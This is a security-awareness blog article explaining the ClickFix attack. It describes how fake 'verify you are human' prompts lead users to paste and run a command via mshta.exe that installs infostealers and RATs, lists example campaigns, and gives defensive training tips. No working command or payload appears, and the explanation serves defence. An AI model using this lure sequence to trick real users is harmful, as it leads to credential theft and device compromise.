Digital Risk: Enterprises Need More Than Cyber Insurance
Threatonomics

Understanding the ClickFix attack

by Emma McGowan , Senior Writer
Published

How three keystrokes can lead to malware infection

Imagine a cyberattack so simple yet so deceptive that all it takes is three keystrokes to compromise your system. This is the reality of the ClickFix attack, a threat that Resilience threat researchers have observed in the wild since 2024 and that seems to be ramping up in recent weeks. ClickFix cleverly manipulates users into executing malicious commands under the guise of a routine bot verification test. Originally used in targeted attacks, this technique has rapidly gained traction, posing a significant risk to a broader audience.

At first glance, ClickFix appears harmless—just another “Verify You Are a Human” CAPTCHA-like prompt. However, beneath this familiar facade lies a dangerous trick: users are guided through three seemingly benign keystrokes that ultimately lead to malware installation. 

This attack preys on human behavior, exploiting trust in common online interactions to deploy password-stealing malware (aka infostealers), remote access trojans (RATs), and other malicious payloads. With cybercriminals refining their tactics to maximize efficiency and deception, understanding the mechanics of ClickFix is critical to preventing its spread.

How the ClickFix attack works

ClickFix thrives on social engineering, manipulating users into unwittingly executing malicious commands. This attack preys on human tendencies to solve perceived problems quickly, especially when faced with urgent or authoritative prompts. Because ClickFix requires user interaction, it can often evade automated security solutions that rely on detecting self-executing malware. 

The attack typically begins with a deceptive pop-up on a compromised or malicious website. This pop-up mimics a standard bot verification message, often displaying an “I’m not a robot” checkbox. Upon interaction, users are prompted to complete three simple steps to confirm their identity.

The first step instructs users to press the Windows Key + R simultaneously. This shortcut opens the Run dialog box, a legitimate Windows feature that allows users to execute commands and programs quickly.

Next, users are told to press CTRL + V, which pastes preloaded malicious code from the website’s virtual clipboard into the Run prompt. This action happens silently, meaning users may not even realize they have copied a harmful command.

Finally, pressing Enter executes the pasted command, triggering a download and execution of malicious code via mshta.exe, a Windows utility designed to run Microsoft HTML application files. This step compromises the device, enabling malware installation.

What malware does ClickFix deliver?

ClickFix has been linked to several well-known malware families, including:

  • XWorm
  • Lumma stealer
  • VenomRAT
  • AsyncRAT
  • Danabot
  • NetSupport RAT

The specific payloads vary but commonly include PowerShell scripts, JavaScript, or portable executable (PE) files. These malware variants are often designed to steal financial credentials, log keystrokes, and grant remote attackers full control over an infected device.

Examples of ClickFix in the wild

ClickFix quickly expanded beyond its initial targeted attacks and now affects a range of industries and individuals. Cybercriminals use phishing emails, compromised websites, and social engineering tactics to deploy this attack across different sectors. While any internet user could potentially fall victim to ClickFix, specific industries have been disproportionately targeted due to their reliance on online communications and digital workflows.

Hospitality

A phishing campaign impersonating Booking.com has been leveraging ClickFix to target hospitality organizations. Fraudulent emails reference negative guest reviews, booking requests, or promotional opportunities to lure recipients into clicking malicious links. Microsoft tracks this campaign as Storm-1865, noting that it has been active since at least December 2024.

Healthcare

Cybersecurity firm Arctic Wolf has observed ClickFix attacks targeting healthcare professionals. One notable instance involved malicious code injected into the HEP2go physical therapy video site, redirecting users to ClickFix prompts.

Car dealerships

In March 2025, DarkReading reported on a ClickFix attack targeting car dealerships. More than 100 automotive industry websites were infected via the streaming service provider LES Automotive. It’s the second major attack on an auto industry third-party vendor in less than a year, following the CDK Global takedown last June.

General public

According to the U.S. Department of Health and Human Services, ClickFix has extensive reach and has appeared in many services used by the general public. Variants of this attack have been observed in:

  • Fake Google Chrome error pages
  • Pop-ups spoofing Facebook login pages
  • Impersonations of PDFSimpli and reCAPTCHA
  • Instances invoking PowerShell scripts from remote websites

How to protect yourself (and your organization) against ClickFix

Because ClickFix relies on social engineering, the best defense is employee education. Security training should always include guidance on how to recognize a phishing scheme, as well as regular phishing attempts by your IT team. With that in mind, here are some best practices to defend against phishing: 

  • Educate employees on how to recognize phishing scams.
  • Warn employees to be skeptical of unexpected pop-ups requesting key combinations.
  • Encourage checking the sender’s email address carefully before taking action.
  • Advise contacting service providers directly to verify suspicious messages.
  • Caution against responding to emails with urgent calls to action.
  • Instruct employees to hover over links to inspect the full URL before clicking.
  • Teach employees to look for typos and subtle misspellings in emails and URLs.

The ClickFix attack is a reminder that cyber threats continue to evolve, finding new ways to bypass traditional security measures. Even seemingly innocuous actions—like pressing a few keys—can lead to real consequences if people are tricked into running malicious code.

Vigilance and skepticism are critical defenses against these attacks. Organizations and individuals must educate themselves on emerging threats, implement strong security protocols, and stay ahead of cybercriminal tactics.

About the Author
Emma McGowan , Senior Writer

Emma McGowan is the Senior Writer for industry-leading cyber risk company Resilience. She has been a full-time writer and editor for over 10 years, focused on technology and women’s health. Tech-fluent and highly motivated, Emma brings holistic experience leading brands in the delivery of high-quality, high-impact, multimedia digital content supported by strategy, planning, and performance analysis.

You might also like

When will quantum decryption become practical?

As part of Cybersecurity Awareness Month, we’re publishing this three-part series that distills a highly technical topic into strategic insights for leaders. Part 1 explained why quantum decryption poses a threat to current encryption systems. Part 2 lays out credible timelines for when the disruption may arrive. Part 3 will offer practical guidance on how […]

What business leaders need to know about post-quantum cyber risk

Quantum computing is on the horizon and with it comes a seismic shift in how organizations must think about cybersecurity risk. The ability of future quantum machines to break today’s cryptographic protections–what we call quantum decryption–could undermine the trust, confidentiality, and resilience of digital business.                                                                                          As part of Cybersecurity Awareness Month, throughout October we are […]

The false promise of paying criminals to delete your data

On October 6, 2025, hackers demanded ransom from Salesforce for nearly one billion stolen customer records. The company’s response was unequivocal: no payment, no negotiation. While the refusal made headlines, the more important question is why Salesforce—and increasingly, other mature organizations—are walking away from the table when criminals offer to “suppress” stolen data. The answer […]

A CISO’s guide to winning the annual budgeting battle

It’s that time of year again. Finance has sent the email with the budget template attached. Your CFO wants preliminary numbers by next week. And you’re staring at a spreadsheet wondering how to justify the security investments your organization desperately needs when last quarter’s board meeting included the phrase “do more with less.” Welcome to […]

How brokers and CISOs can lead the charge for Cybersecurity Awareness Month 2025

October is Cybersecurity Awareness Month, and this year’s theme—”Building a Cyber Strong America“—has never been more relevant. For over two decades, this initiative led by CISA and the National Cybersecurity Alliance has spotlighted the importance of taking daily action to reduce online risks. In 2025, the focus shifts to the government entities and small-to-medium businesses […]

What the Collins Aerospace outage reveals about vendor risk

On September 19, 2025, chaos erupted at airports across Europe—but not because of weather, strikes, or mechanical failures. Collins Aerospace’s MUSE platform, the digital backbone handling passenger check-in and baggage processing from Heathrow to Dublin, went dark after a ransomware attack. Within hours, major airports including Brussels, Berlin, and Dublin were forced to revert to […]